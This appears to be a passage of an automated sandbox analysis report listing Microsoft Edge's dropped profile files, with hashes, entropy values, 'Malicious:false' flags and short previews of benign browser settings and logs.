                                                                                                                                                                                                                                                                                    Entropy (8bit):5.594264569603928
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:etZWUUlHBwl15NWw5nJVqXZTD8WpV03y1x4Cxq9Ilsw0ha75MyG:etZd5N/FqXZT3pV03Sx4Lyls5aGyG
                                                                                                                                                                                                                                                                                    MD5:532618B23AB0350C7392582CB81E0CED
                                                                                                                                                                                                                                                                                    SHA1:61CB289F4E8A9FBEA760D76AE3E006DA69AAF480
                                                                                                                                                                                                                                                                                    SHA-256:354216D4D83E6C43735424C66513E6D9213166DEC1DE377EFC44D3622E7C57CD
                                                                                                                                                                                                                                                                                    SHA-512:A2C4FE37D4BC0342DAFCD79DDA715526876D22B05355B07B82FC090C7D5E9C54D97BC2EA15D55EEFE1C94CAE28C376C2F24C99AB43D718238E2D76658C7AB04A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:....7................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":840}.!_https://ntp.msn.com..LastKnownPV..1735307249465.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735307250407.._https://ntp.msn.com..MUID!.1AA6CB7BE4CF62801FB6DE19E5AD630B.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735307249537,"schedule":[9,-1,18,16,-1,-1,-1],"scheduleFixed":[9,-1,18,16,-1,-1,-1],"simpleSchedule":[31,47,16,46,40,41,42]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735307249434.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.117441596431297
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:inyq2P923oH+Tcwt8a2jMGIFUt8dmaI1Zmw+d4YjRkwO923oH+Tcwt8a2jMmLJ:iyv4Yeb8EFUt8dmaI1/+d4YF5LYeb8bJ
                                                                                                                                                                                                                                                                                    MD5:CA36B8D64F09DEB5DB09B4756398AFAA
                                                                                                                                                                                                                                                                                    SHA1:3E4483A5E382EA6A59ECAFFB10435FAC595BECE7
                                                                                                                                                                                                                                                                                    SHA-256:BE2FE01D7B3709023B293EB7C1F3B203D016346A8417CFBD99CE739C6983BA77
                                                                                                                                                                                                                                                                                    SHA-512:C08EA581E225D3A2191B3A78F7B0C2EAFA450AB046A02D0FCCB3B35980209C03215390E9F8F1E37406DBEB61BBFEDAE1BA295367E7122C2A061BA49FB55CFDA6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.118 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-08:47:12.119 1070 Recovering log #3.2024/12/27-08:47:12.123 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.771801683546045
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:tTvbLHSR9O5xq7LjVG6rfB8iS+Xcf0L/ZJVb:VvHyzOXqXjk6rf2+XI0LhJVb
                                                                                                                                                                                                                                                                                    MD5:D5093C13B2A67570AE390737511DD4A0
                                                                                                                                                                                                                                                                                    SHA1:4AB41FC33F733856317698D6AB5AAEE60364A7F3
                                                                                                                                                                                                                                                                                    SHA-256:60EB054D0349211A1160075E6F464B15A968CF48A82901183DC8760CFFA6339E
                                                                                                                                                                                                                                                                                    SHA-512:495008E37D39D0F69B8795ABEA0122F3CB9AF53AE27A0237D946C69ADABB60D0DF7F6BA75D787668A72CDFE742C89D85A310905BB121ABC4CDCAE8E68A33644F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                    MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                    SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                    SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                    SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2146821244220505
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTIM:eIEumQv8m1ccnvS609qRZv
                                                                                                                                                                                                                                                                                    MD5:2E438E1A076CDD8B6ACEC5EF516AB468
                                                                                                                                                                                                                                                                                    SHA1:2089FC3FE6A0B8C26778408E1BAF73296472226E
                                                                                                                                                                                                                                                                                    SHA-256:4ED9423B33CD9748B552F038CAF9AC09782339CD750D0249F8FDC78E910A0D4D
                                                                                                                                                                                                                                                                                    SHA-512:687E6E9BFDA387AB73510C2BFD2C9C968F562E488C29B1E4BD85ECF55D344CB2450D08FF0E577E69B6286E01A9E5DB0EE5EB042EEBCABB922E4B0FAC04F34D11
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                    MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                    SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                    SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                    SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                    MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                    SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                    SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                    SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                    Malicious:false
Preview:SQLite format 3......@ ..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9817
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.116053717911298
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:st5kdpIsJHFsZihUkJBZP8AbV+FSCQA66WSiaFIMYOPKYJ:st5QIsJHFfhvbGrQx6WSiaTYM
                                                                                                                                                                                                                                                                                    MD5:4DE0BDB42BE872098111C0DA367123FB
                                                                                                                                                                                                                                                                                    SHA1:41DC28CF22706F0F448BE2953A92B9D5CB3AB34F
                                                                                                                                                                                                                                                                                    SHA-256:4837A4C833F75DDA62FFF1F786D37E3A51DD932633692D5A5B2E1F990B11BD05
                                                                                                                                                                                                                                                                                    SHA-512:893E21B0BFC0A4C19B6E0DDC1E23309E890F68A85ED3BDCB0630C8AA4E1E93CF2B8DA6CA7FD53FFE70950F3085D77E0D63D7C78C8A1FC8D843E76CCEF4B847B7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.567446526186164
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:c64Tl7WPl1fwH8F1+UoAYDCx9Tuqh0VfUC9xbog/OV8JYSLrwHqpVtuu:c64Tl7WPl1fwHu1jadeSAstB
                                                                                                                                                                                                                                                                                    MD5:F669505FCC3009C42D05E9A02BD3ABC6
                                                                                                                                                                                                                                                                                    SHA1:46E91F55009D6AD03AE9CDC1DE4C19B8D1F14DA9
                                                                                                                                                                                                                                                                                    SHA-256:5F47D70862C4CF14B3A66990964568E1AC77E79DB07C68D11F1021B7557CBE83
                                                                                                                                                                                                                                                                                    SHA-512:28748644903D7720E9189DB86E06ACDAEC4FA6FCA08B97F795B47C78D9ADE822BBC4FC32DCA9BCA3F7C42F403993CDD0623253E0E90B398B8B1A80AE488BFDCD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379780831720600","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379780831720600","location":5,"ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                    MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                    SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                    SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                    SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):299
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.195570155576596
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iJXhq1923oH+TcwtE/a252KLlgpkq2P923oH+TcwtE/a2ZIFUv:iJXBYeb8xLapkv4Yeb8J2FUv
                                                                                                                                                                                                                                                                                    MD5:629EDA51CD7579C735334FE16D917061
                                                                                                                                                                                                                                                                                    SHA1:7CA36F7EA53767EF6469D0D19F1AE19254D0717B
                                                                                                                                                                                                                                                                                    SHA-256:0ADD5CD8651EEAA1163B7ECA5CADFEA7652D41F435FC486A0B44A357EF67B10D
                                                                                                                                                                                                                                                                                    SHA-512:E2A8E357D7017876080B64CBDC08EE0549359E1B5E2408B41D526DC3055D0389CF87D38D4D98F7CD8EC89C7D54626B161A762274F428EB04E2E421A33D7C7AFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:30.395 1b90 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/27-08:47:30.415 1b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):114575
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.579236414546807
                                                                                                                                                                                                                                                                                    Encrypted:false
